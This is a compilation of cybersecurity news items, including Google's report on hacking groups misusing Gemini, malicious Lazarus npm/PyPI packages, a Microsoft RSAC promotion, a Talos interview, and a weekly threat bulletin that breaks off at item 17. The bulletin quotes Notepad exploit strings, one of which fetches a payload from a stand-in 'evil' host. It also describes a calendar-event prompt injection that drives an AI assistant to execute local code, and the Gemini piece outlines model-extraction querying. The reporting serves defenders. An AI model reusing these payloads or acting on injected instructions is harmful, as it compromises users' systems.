Google Reports State-Backed Hackers Using Gemini AI for Recon and Attack Support

Google on Thursday said it observed the North Korea-linked threat actor known as UNC2970 using its generative artificial intelligence (AI) model Gemini to conduct reconnaissance on its targets, as various hacking groups continue to weaponize the tool for accelerating various phases of the cyber attack life cycle, enabling information operations, and even conducting model extraction attacks.

"The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance," Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. "This actor's target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information."

The tech giant's threat intelligence team characterized this activity as a blurring of boundaries between what constitutes routine professional research and malicious reconnaissance, allowing the state-backed actor to craft tailored phishing personas and identify soft targets for initial compromise.

UNC2970 is the moniker assigned to a North Korean hacking group that overlaps with a cluster that's tracked as Lazarus Group, Diamond Sleet, and Hidden Cobra. It's best known for orchestrating a long-running campaign codenamed Operation Dream Job to target aerospace, defense, and energy sectors with malware under the guise of approaching victims under the pretext of job openings.

GTIG said UNC2970 has "consistently" focused on defense targeting and impersonating corporate recruiters in their campaigns, with the target profiling including searches for "information on major cybersecurity and defense companies and mapping specific technical job roles and salary information."

UNC2970 is far from the only threat actor to have misused Gemini to augment their capabilities and move from initial reconnaissance to active targeting at a faster clip. Some of the other hacking crews that have integrated the tool into their workflows are as follows -

• UNC6418 (Unattributed), to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses.
• Temp.HEX or Mustang Panda (China), to compile a dossier on specific individuals, including targets in Pakistan, and to gather operational and structural data on separatist organizations in various countries.
• APT31 or Judgement Panda (China), to automate the analysis of vulnerabilities and generate targeted testing plans by claiming to be a security researcher.
• APT41 (China), to extract explanations from open-source tool README.md pages, as well as troubleshoot and debug exploit code.
• UNC795 (China), to troubleshoot their code, conduct research, and develop web shells and scanners for PHP web servers.
• APT42 (Iran), to facilitate reconnaissance and targeted social engineering by crafting personas that induce engagement from the targets, as well as develop a Python-based Google Maps scraper, develop a SIM card management system in Rust, and research the use of a proof-of-concept (PoC) for a WinRAR flaw (CVE-2025-8088).

Google also said it detected a malware called HONESTCUE that leverages Gemini's API to outsource functionality generation for the next-stage, along with an AI-generated phishing kit codenamed COINBAIT that's built using Lovable AI and masquerades as a cryptocurrency exchange for credential harvesting. Some aspects of COINBAIT-related activity have been attributed to a financially motivated threat cluster dubbed UNC5356.

"HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini's API and receives C# source code as the response," it said. "However, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the 'stage two' functionality, which downloads and executes another piece of malware."

The fileless secondary stage of HONESTCUE then takes the generated C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory, thereby leaving no artifacts on disk.

Google has also called attention to a recent wave of ClickFix campaigns that leverage the public sharing feature of generative AI services to host realistic-looking instructions to fix a common computer issue and ultimately deliver information-stealing malware. The activity was flagged in December 2025 by Huntress.

Lastly, the company said it identified and disrupted model extraction attacks that are aimed at systematically querying a proprietary machine learning model to extract information and build a substitute model that mirrors the target's behavior. In a large-scale attack of this kind, Gemini was targeted by over 100,000 prompts that posed a series of questions aimed at replicating the model's reasoning ability across a broad range of tasks in non-English languages.

Last month, Praetorian devised a PoC extraction attack where a replica model achieved an accuracy rate of 80.1% simply by sending a series of 1,000 queries to the victim's API and recording the outputs and training it for 20 epochs.

"Many organizations assume that keeping model weights private is sufficient protection," security researcher Farida Shafik said. "But this creates a false sense of security. In reality, behavior is the model. Every query-response pair is a training example for a replica. The model’s behavior is exposed through every API response." 

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Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems

Cybersecurity researchers have discovered a fresh set of malicious packages across npm and the Python Package Index (PyPI) repository linked to a fake recruitment-themed campaign orchestrated by the North Korea-linked Lazarus Group.

The coordinated campaign has been codenamed graphalgo in reference to the first package published in the npm registry. It's assessed to be active since May 2025.

"Developers are approached via social platforms like LinkedIn and Facebook, or through job offerings on forums like Reddit," ReversingLabs researcher Karlo Zanki said in a report. "The campaign includes a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges."

Notably, one of the identified npm packages, bigmathutils, attracted more than 10,000 downloads after the first, non-malicious version was published, and before the second version containing a malicious payload was released. The names of the packages are listed below -

npm - 

• graphalgo
• graphorithm
• graphstruct
• graphlibcore
• netstruct
• graphnetworkx
• terminalcolor256
• graphkitx
• graphchain
• graphflux
• graphorbit
• graphnet
• graphhub
• terminal-kleur
• graphrix
• bignumx
• bignumberx
• bignumex
• bigmathex
• bigmathlib
• bigmathutils
• graphlink
• bigmathix
• graphflowx

PyPI -

• graphalgo
• graphex
• graphlibx
• graphdict
• graphflux
• graphnode
• graphsync
• bigpyx
• bignum
• bigmathex
• bigmathix
• bigmathutils

As with many job-focused campaigns conducted by North Korean threat actors, the attack chain begins with establishing a fake company like Veltrix Capital in the blockchain and cryptocurrency trading space, and then setting up the necessary digital real estate to create an illusion of legitimacy.

This includes registering a domain and creating a related GitHub organization to host several repositories for use in coding assessments. The repositories have been found to contain projects based on Python and JavaScript.

"Examination of these repositories didn't reveal any obvious malicious functionality," Zanki said. "That is because the malicious functionality was not introduced directly via the job interview repositories, but indirectly – through dependencies hosted on the npm and PyPI open-source package repositories."

The idea behind setting up these repositories is to trick candidates who apply to its job listings on Reddit and Facebook Groups into running the projects on their machines, effectively installing the malicious dependency and triggering the infection. In some cases, victims are directly contacted by seemingly legitimate recruiters on LinkedIn.

The packages ultimately act as a conduit to deploy a remote access trojan (RAT) that periodically fetches and executes commands from an external server. It supports various commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files.

Interestingly, the command-and-control (C2) communication is protected by a token-based mechanism to ensure that only requests with a valid token are accepted. The approach was previously observed in 2023 campaigns linked to a North Korean hacking group called Jade Sleet, which is also known as TraderTraitor or UNC4899.

It essentially works like this: the packages send system data as part of a registration step to the C2 server, which responds with a token. This token is then sent back to the C2 server in subsequent requests to establish that they are originating from an already registered infected system.

"The token-based approach is a similarity [...] in both cases and has not been used by other actors in malware hosted on public package repositories as far as we know," Zanki told The Hacker News at that time.

The findings show that North Korean state-sponsored threat actors continue to poison open-source ecosystems with malicious packages in hopes of stealing sensitive data and conducting financial theft, a fact evidenced by the RAT's checks to determine if the MetaMask browser extension is installed in the machine.

"Evidence suggests that this is a highly sophisticated campaign," ReversingLabs said. "Its modularity, long-lived nature, patience in building trust across different campaign elements, and the complexity of the multilayered and encrypted malware point to the work of a state-sponsored threat actor."

More Malicious npm Packages Found

The disclosure comes as JFrog uncovered a sophisticated, malicious npm package called "duer-js" published by a user named "luizaearlyx." While the library claims to be a utility to "make the console window more visible," it harbors a Windows information stealer called Bada Stealer.

It's capable of gathering Discord tokens, passwords, cookies, and autofill data from Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser, cryptocurrency wallet details, and system information. The data is then exfiltrated to a Discord webhook, as well as the Gofile file storage service as a backup.

"In addition to stealing information from the host it infected, the malicious package downloads a secondary payload," security researcher Guy Korolevski said. "This payload is designed to run on the Discord Desktop app startup, with self-updating capabilities, stealing directly from it, including payment methods used by the user."

It also coincides with the discovery of another malware campaign that weaponizes npm to extort cryptocurrency payments from developers during package installation using the "npm install" command. The campaign, first recorded on February 4, 2026, has been dubbed XPACK ATTACK by OpenSourceMalware.

duer-js malicious package flow, hijacking Discord’s Electron environment

The names of the packages, all uploaded by a user named "dev.chandra_bose," are listed below -

• xpack-per-user
• xpack-per-device
• xpack-sui
• xpack-subscription
• xpack-arc-gateway
• xpack-video-submission
• test-npm-style
• xpack-subscription-test
• testing-package-xdsfdsfsc

"Unlike traditional malware that steals credentials or executes reverse shells, this attack innovatively abuses the HTTP 402 'Payment Required' status code to create a seemingly legitimate payment wall," security researcher Paul McCarty said. "The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker's wallet, while collecting GitHub usernames and device fingerprints."

"If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they've encountered malware versus what appeared to be a legitimate paywall for package access."

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Your complete guide to Microsoft experiences at RSAC™ 2026 Conference

The era of AI is reshaping both opportunity and risk faster than any shift security leaders have seen. Every organization is feeling the momentum; and for security teams, the question is no longer if AI will transform their work, but how to stay ahead of what comes next.

At Microsoft, we see this moment giving rise to what we call the Frontier Firm: organizations that are human-led and agent-operated. With more than 80% of leaders already using agents or planning to within the year, we’re entering a world where every person may soon have an entire agentic team at their side¹. By 2028, IDC projects 1.3 billion agents in use—a scale that changes everything about how we work and how we secure².

In the agentic era, security must be ambient and autonomous, just like the AI it protects. This is our vision for security as the core primitive, woven into and around everything we build and throughout everything we do. At RSAC 2026, we’ll share how we are delivering on that vision through our AI-first, end-to-end, security platform that helps you protect every layer of the AI stack and secure with agentic AI.

Join us at RSAC Conference 2026—March 22–26 in San Francisco

RSAC 2026 will give you a front‑row seat to how AI is transforming the global threat landscape, and how defenders can stay ahead with:

• A deeper understanding of how AI is reshaping the global threat landscape
• Insight into how Microsoft can help you protect every layer of the AI stack and secure with agentic AI
• Product demos, curated sessions, executive conversations, and live meetings with our experts in the booth

This is your moment to see what’s next and what’s possible as we enter the era of agentic security.

Microsoft at RSAC™ 2026

From Microsoft Pre‑Day to innovation sessions, networking opportunities, and 1:1 meetings, explore experiences designed to help you navigate the age of AI with clarity and impact.

Explore conference events

Microsoft Pre-Day: Your first look at what’s next in security

Kick off RSAC 2026 on Sunday, March 22 at the Palace Hotel for Microsoft Pre‑Day, an exclusive experience designed to set the tone for the week ahead.

Hear keynote insights from Vasu Jakkal, CVP of Microsoft Security Business and other Microsoft security leaders as they explore how AI and agents are reshaping the security landscape.

You’ll discover how Microsoft is advancing agentic defense, informed by more than 100 trillion security signals each day. You’ll learn how solutions like Agent 365 deliver observability at every layer, and how Microsoft’s purpose‑built security capabilities help you secure every layer of the AI stack. You’ll also explore how our expert-led services can help you defend against cyberthreats, build cyber resilience, and transform your security operations.

The experience concludes with opportunities to connect, including a networking reception and an invite-only dinner for CISOs and security executives.

Microsoft Pre‑Day is your chance to hear what is coming next and prepare for the week ahead. Secure your spot today.

Executive events: Exclusive access to insights, strategy, and connections

For CISOs and senior security decision makers, RSAC 2026 offers curated experiences designed to deliver maximum value:

• CISO Dinner (Sunday, March 22): Join Microsoft Security executives and fellow CISOs for an intimate dinner following Microsoft Pre-Day. Share insights, compare strategies, and build connections that matter.
• The CISO and CIO Mandate for Securing and Governing AI (Monday, March 23): A session outlining why organizations need integrated AI security and governance to manage new risks and accelerate responsible innovation.
• Executive Lunch & Learn: AI Agents are here! Are you Ready? (Tuesday, March 24): A panel exploring how observability, governance, and security are essential to safely scaling AI agents and unlocking human potential.
• The AI Risk Equation: Visibility, Control, and Threat Acceleration (Wednesday, March 25): A deeply interactive discussion on how CISOs address AI proliferation, visibility challenges, and expanding attack surfaces while guiding enterprise risk strategy.
• Post-Day Forum (Thursday, March 26): Wrap up RSAC with an immersive, half‑day program at the Microsoft Experience Center in Silicon Valley—designed for deeper conversations, direct access to Microsoft’s security and AI experts, and collaborative sessions that go beyond the main‑stage content. Explore securing and managing AI agents, protecting multicloud environments, and deploying agentic AI through interactive discussions. Transportation from the city center will be provided. Space is limited, so register early.

These experiences are designed to help CISOs move beyond theory and into actionable strategies for securing their organizations in an AI-first world.

Keynote and sessions: Insights you can act on

On Monday, March 23, don’t miss the RSAC 2026 keynote featuring Vasu Jakkal, CVP of Microsoft Security. In Ambient and Autonomous Security: Building Trust in the Agentic AI Era (3:55 PM-4:15 PM PDT), learn how ambient, autonomous platforms with deep observability are evolving to address AI-powered threats and build a trusted digital foundation.

Here are two sessions you don’t want to miss:

1. Security, Governance, and Control for Agentic AI 

• Monday, March 23 | 2:20–3:10 PM. Learn the core principles that keep autonomous agents secure and governed so organizations can innovate with AI without sprawl, misuse, or unintended actions.
  • Speakers: Neta Haiby, Partner, Product Manager and Tina Ying, Director, Product Marketing, Microsoft 

2. Advancing Cyber Defense in the Era of AI Driven Threats 

• Tuesday, March 24 | 9:40–10:30 AM. Explore how AI elevates threat sophistication and what resilient, intelligence-driven defenses look like in this new era.
  • Speaker: Brad Sarsfield, Senior Director, Microsoft Security, NEXT.ai

Plus, don’t miss our sessions throughout the week: 

• Monday, March 23 
  • Cyber Coaches: Lessons from Securing US Water Infrastructure
• Tuesday, March 24 
  • How to Red Team a Frontier AI Model
  • Turning Mandates Into Momentum: Policy Tools for PQC Adoption 
  • AI, Identity, and Ethical Governance: Building Trust in High Stakes Systems
• Wednesday, March 25 
  • VC Investments—2026 and Beyond
  • The Fundamentals Forum: Let’s Get Back to Basics
• Thursday, March 26 
  • Beyond Red Teaming: Why AI Security Needs a Bigger Playbook
  • Architecting Systems for Human–AI Collaboration in Cyber Defense
  • Disrupting Cybercrime Networks, Successfully, Continuously, and at Scale
  • Automated Cyber Defense: Lessons from DARPA’s AI Cyber Challenge
  • AI on Trial: How CISOs Navigate Hype, Risk, and Accountability 

Microsoft Booth #5744: Theater sessions and interactive experiences

Visit the Microsoft booth at Moscone Center for an immersive look at how modern security teams protect AI‑powered environments. Connect with Microsoft experts, explore security and governance capabilities built for agentic AI, and see how solutions work together across identity, data, cloud, and security operations.

Test your skills and compete in security games

At the center of the booth is an interactive single‑player experience that puts you in a high‑stakes security scenario, working with adaptive agents to triage incidents, optimize conditional access, surface threat intelligence, and keep endpoints secure and compliant, then guiding you to demo stations for deeper exploration.

Quick sessions, big takeaways, plus a custom pet sticker

You can also stop by the booth theater for short, expert‑led sessions highlighting real‑world use cases and practical guidance, giving you a clear view of how to strengthen your security approach across the AI landscape—and while you’re there, don’t miss the Security Companion Sticker activation, where you can upload a photo of your pet and receive a curated AI-generated sticker.

Microsoft Security Hub: Your space to connect

Throughout the week, the iconic Palace Hotel will serve as Microsoft’s central gathering place—a welcoming hub where you can step away from the bustle of the conference. It’s a space to recharge and connect with Microsoft security experts and executives, participate in focused thought leadership sessions and roundtable discussions, and take part in networking experiences designed to spark meaningful conversations. Full details on sessions and activities are available on the Microsoft Security Experiences at RSAC™ 2026 page.

Customers can also take advantage of scheduled one-on-one meetings with Microsoft security experts during the week. These meetings offer an opportunity to dig deeper into today’s threat landscape, discuss specific product questions, and explore strategies tailored to your organization. To schedule a one-on-one meeting with Microsoft executives and subject matter experts, speak with your account representative or submit a meeting request form.

Partners: Building security together

Microsoft’s presence at RSAC 2026 isn’t just about our technology. It’s about the ecosystem. Visit the booth and the Security Hub to meet members of the Microsoft Intelligent Security Association (MISA) and explore how our partners extend and enhance Microsoft Security solutions. From integrated threat intelligence to compliance automation, these collaborations help you build a stronger, more resilient security posture.

Special thanks to Ascent Solutions, Avertium, BlueVoyant, CyberProof, Darktrace, and Huntress for sponsoring the Microsoft Security Hub and karaoke party.

Why join us at RSAC?

Attending RSAC™ 2026? By engaging with Microsoft Security, you’ll gain clear perspective on how AI agents are reshaping risk and response, practical guidance to help you focus on what matters most, and meaningful connections with peers and experts facing the same challenges.

Together, we can make the world safer for all. Join us in San Francisco and be part of the conversation defining the next era of cybersecurity.

Explore Microsoft experiences at RSAC 2026

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

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¹According to data from the 2025 Work Trend Index, 82% of leaders say this is a pivotal year to rethink key aspects of strategy and operations, and 81% say they expect agents to be moderately or extensively integrated into their company’s AI strategy in the next 12–18 months. At the same time, adoption on the ground is spreading but uneven: 24% of leaders say their companies have already deployed AI organization-wide, while just 12% remain in pilot mode.

²IDC Info Snapshot, sponsored by Microsoft, 1.3 Billion AI Agents by 2028, May 2025 #US53361825

The post Your complete guide to Microsoft experiences at RSAC™ 2026 Conference appeared first on Microsoft Security Blog.

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Ryan Liles, master of technical diplomacy

Cisco Talos is back with another inside look at the people who keep the internet safe. This time, Amy chats with Ryan Liles, who bridges the gap between Cisco’s product teams and the third-party testing labs that put Cisco products through their paces. Ryan pulls back the curtain on the delicate dance of technical diplomacy, how he keeps his cool when the stakes are high, and how speaking up has helped him reshape industry standards. Plus, get a glimpse of the hobbies that keep him recharged when he’s off the clock.

Amy Ciminnisi: Ryan, you shared that you are on the Vulnerability Research and Discovery team, but you work in a little bit of a different niche. Can you talk a little bit about what you do?

Ryan Liles: My primary role is to work with all of the Cisco product teams. So anybody that Talos feeds security intelligence to — Firewall, Email, Endpoint — anybody that we write content for, I work with their product teams to help get their products tested externally. Cisco can come out all day and say our products are the best at what they do, but no one's going to take our word for it. So we have to get someone else to say that for us, and that's where I come in.

AC: Third-party testing involves coordinating with external organizations and standards groups. You mentioned it can be difficult sometimes and you have to choose your words carefully. What are some of the biggest challenges you face when working across these various groups? Do you have a particular method of overcoming them?

RL: The reason I fell into this role at Cisco is because of all the contacts I made while working at NSS Labs. The third-party testing industry for security appliances is like a lot of the rest of the security industry — very small. Even though there's a large dollar amount tied to it in the marketplace, the number of people in it is very small. So you're going to run into the same personalities over and over again throughout your career in security. Because I try to generally be friendly with those people and keep my network alive, I have a lot of personal relationships that I can leverage when it comes to having difficult conversations.

By difficult conversations, I mean if we've found a bug in the product or if a third-party test lab acquired our product through means not involving us and did some testing that didn't turn out great, I can have the conversations with them where we discuss both technically what was their testing methodology and how did they deploy the products. If there were instances where we feel maybe they didn't deploy the product correctly or there's some flaws in their methodology, being able to have that kind of discussion with a test lab, while not frustrating them, takes a lot of diplomatic skills. I think that's the biggest contributor to my success in this role — being able to have those conversations, leaving emotion out of things, and just sticking to the technical facts and saying, here's what went wrong, here's what went right, let's figure out the best way to fix this. That has really contributed to how Cisco and Talos interface with third-party testing labs and maintain those relationships.

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Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.

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ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

Threat activity this week shows one consistent signal — attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight.

Another shift is how access is gained versus how it’s used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent. The objective is less about disruption and more about staying embedded long enough to extract value.

There’s also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable.

Below is this week’s ThreatsDay Bulletin — a tight scan of the signals that matter, distilled into quick reads. Each item adds context to where threat pressure is building next.

1. Notepad RCE via Markdown Links

   Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in its Notepad app that could result in remote code execution. "Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network," Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to run remote files. "The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user," the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with "file://" links that point to executable files ("file://C:/windows/system32/cmd.exe") or contain special URIs ("ms-appinstaller://?source=https://evil/xxx.appx") to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May.

2. APT Pressure Intensifies on Taiwan

   TeamT5 said tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, out of which 173 attacks targeted Taiwan. "Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives," the security vendor said. "Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments."

3. Node.js Stealer Hits Windows

   A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration. "The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details," CYFIRMA said.

4. Marco Stealer Expands Data Theft

   Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025. Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim's system. "Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker," Zscaler ThreatLabz said. "Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests."

5. Telegram Sessions Hijacked via OAuth Abuse

   A new account takeover campaign has been observed abusing Telegram's native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim's existing session. Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram's official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. "Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure," CYFIRMA noted. "By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion."

6. Discord Expands Global Age Checks

   Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies don't leave a user's device, that identity documents submitted to third-party vendors, in this case k-ID, are "deleted quickly" or "immediately" after age confirmation, and that a user's age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia. The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third-parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that "a phased global rollout" would begin in "early March," at which point all users globally would be defaulted to “teen-appropriate" experiences.

7. GuLoader Refines Evasion Tradecraft

   A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers.

8. $73.6M Pig-Butchering Scam Sentence

   Daren Li, 42, a dual national of China and St. Kitts and Nevis has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million. Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025. His present whereabouts are unknown. "As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services," the U.S. Justice Department said. "The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications." The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust. Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds. "Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency," the department said.

9. 0-Click AI Prompt RCE Risk

   A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system by a simple Google Calendar event when a user issues a harmless prompt like "Please check my latest events in google cal[endar] and then take care of it for me." The problem stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfil user requests without enforcing proper security boundaries. The phrase "take care of it" does the heavy lifting here, as the artificial intelligence (AI) assistant interprets it as a justification to execute arbitrary instructions embedded in those events without seeking users' permission. The flaw impacts more than 10,000 active users and 50 DXT extensions, according to LayerX. "Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges," the browser security company said. "As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent. If exploited by a bad actor, even a benign prompt ('take care of it'), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system." Anthropic has opted not to fix the issue at this time. A similar Google Gemini prompt injection flaw was disclosed by Miggo Security last month.

10. Data-Theft Ransomware Surges

    A nascent ransomware group called Coinbase Cartel has claimed more than 60 victims since it first emerged in September 2025. "Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access," Bitdefender said. The healthcare, technology, and transportation industries represent a major chunk of Coinbase Cartel's greatest victim demographic to date. The healthcare organizations impacted by the threat actor are primarily based in the U.A.E. Some of the other prominent groups that are focused on only data theft are World Leaks and PEAR (Pure Extraction and Ransom). The development paints a picture of an ever-evolving ransomware landscape populated by new and old actors, even as the threat is getting increasingly professionalized as attackers streamline operations. According to data from Cyble, 6,604 ransomware attacks were recorded in 2025, up 52% from the 4,346 attacks claimed by ransomware groups in 2024.

11. Google Expands Privacy Takedowns

    Google has expanded its "Results about you" tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from search results, as well as other details like driver's license numbers, passport numbers, and Social Security numbers. "We understand that removing existing content is only part of the solution," Google said. "For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches."

12. Monitoring Tools Used for Ransomware

    Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware. The two incidents, believed to be the work of the same threat actor, took place in January and February 2026. Net Monitor comes with various capabilities that go beyond employee productivity tracking, including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation. These features, coupled with SimpleHelp's remote access functionality, make them attractive tools for attackers looking to blend into enterprise environments without deploying traditional malware. What's more, Net Monitor for Employees Professional bundles a pseudo-terminal ("winpty-agent.exe") that facilitates full command execution. Bad actors have been found to leverage this aspect to conduct reconnaissance, deliver additional payloads, and deploy secondary remote access channels, turning it into a functional remote access trojan. "In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware," Huntress said.
13. 0APT Victim Claims Questioned

    A threat actor called 0APT appears to be falsely claiming that it has breached over 200 victims within a span of a week since launching their data leak site on January 28, 2026. Further analysis has determined that the victims are a blend of wholly fabricated generic company names and recognizable organizations that threat actors have not breached, GuidePoint's Research and Intelligence Team said. The data leak site went offline on February 8, 2026, before resurfacing the next day with a list of more than 15 very large multinational organizations. "0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group," security researcher Jason Baker noted. While signs suggest that the group may be bluffing about its victim count, the Windows and Linux ransomware samples have been found to be fully operational, per Halcyon. It's worth pointing out that ransomware groups like RansomedVC have listed fabricated attacks on their data leak sites to deceive victims. Viewed in that light, 0APT's exaggerated claims are likely an attempt to gain visibility and momentum among its peers. Its origins remain unknown.

14. SYSTEM RCE via Named Pipe

    A high-risk security vulnerability (CVE-2025-67813, CVSS score: 5.3) within Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. "Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network," NetSPI said. The named pipe implements a custom IPC protocol that supports dangerous operations, including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent.

15. AI Traffic Scans to Block VPNs

    Russia's internet watchdog will use artificial intelligence (AI) technology to analyze internet traffic and restrict the operation of VPN services, Forbes Russia reported. The Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year. The Russian government has blocked access to tens of VPN apps in recent years. It also maintains a registry of banned websites.

16. Mispadu Expands Banking Attacks

    Cofense said it has observed Mispadu campaigns targeting Latin America, particularly Mexico and Brazil, and to a lesser extent in Spain, Italy, and Portugal, with phishing emails containing HTML Application (HTA) attachments that are designed to bypass Secure Email Gateways (SEGs) to reach the inboxes of employees across the world. "The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself," Cofense said. "In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated. This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR." Recent iterations of the banking trojan come with the ability to self-propagate on infected hosts via email and expand the target online banking websites to include banks outside of Latin America as well as cryptocurrency-based exchanges.

17. ScreenConnect Deployed via Phish

